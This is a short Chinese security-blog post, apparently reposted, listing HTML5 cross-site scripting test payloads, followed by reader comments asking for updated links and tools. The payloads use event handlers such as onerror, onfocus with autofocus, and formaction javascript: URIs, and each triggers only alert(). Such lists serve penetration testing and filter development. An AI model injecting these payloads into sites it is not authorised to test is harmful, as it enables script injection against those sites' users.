国外某童鞋收集整理的针对HTML5的XSS测试代码。
<video> <source onerror="javascript:alert(1)"> 引入媒体类测试代码Example: <video onerror="javascript:alert(1)"><source> <audio onerror="javascript:alert(1)"><source> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> 表单点击测试代码Example: <button form=test onformchange=alert(2)>X <form><button formaction="javascript:alert(1)">
更多HTML5 安全请访问http://html5sec.org
转自:http://www.nxadmin.com/penetration/1173.html
- 作者:独自等待 | 发布:2013年07月21日
- 分类:跨站攻击
- 标签:html5,XSS
- 转载文章请注明:HTML5下的XSS测试代码 | 独自等待-信息安全博客
test测试
求更新连接....
加油!
更新下链接吧,现在找个工具真难
默认没有开启强制路由的才可以
文章不错非常喜欢
多次在您网站上学到有用的东西,
大牛,能不能把工具发我邮箱,链
Thanks♪(・ω・)ノ感谢
dalao,那道小红的80端口